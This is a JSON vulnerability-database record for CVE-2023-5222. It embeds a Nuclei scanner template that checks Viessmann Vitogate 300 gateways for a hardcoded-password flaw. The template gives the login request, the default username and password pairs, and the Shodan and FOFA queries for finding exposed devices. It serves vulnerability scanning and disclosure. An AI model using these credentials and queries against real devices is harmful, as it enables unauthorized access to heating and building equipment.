{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-5222/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-5222/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-5222/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-5222/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-5222/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-5222"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-5222"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-5222.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-5222\n\ninfo:\n  name: Viessmann Vitogate 300 - Hardcoded Password\n  author: ritikchaddha\n  severity: critical\n  description: |\n    A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.\n  impact: |\n    An attacker could potentially gain unauthorized access to the device.\n  remediation: |\n    Update the device firmware to remove the hardcoded password or change it to a strong, unique password.\n  reference:\n    - https://vuldb.com/?ctiid.240364\n    - https://vuldb.com/?id.240364\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-5222\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-5222\n    cwe-id: CWE-259\n    epss-score: 0.74525\n    epss-percentile: 0.99475\n    cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: title:\"Vitogate 300\"\n    fofa-query: title=\"Vitogate 300\"\n    vendor: viessmann\n    product: vitogate_300_firmware\n  tags: cve,cve2023,viessmann,vitogate,default-login,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /cgi-bin/vitogate.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n\n    attack: pitchfork\n    payloads:\n      username:\n        - vitomaster\n        - vitogate\n      password:\n        - viessmann1917\n        - viessmann\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'admin\":true'\n          - '\"sessionId\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207a021e170b42ea16071c9ed96a5f5280ea89288e599d85b348b6b752322ecded02203b1c49e33a7fe605c43341369d718b1ed6650fa0a1ba5b3eec6a827e1c14a146:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-5222"
}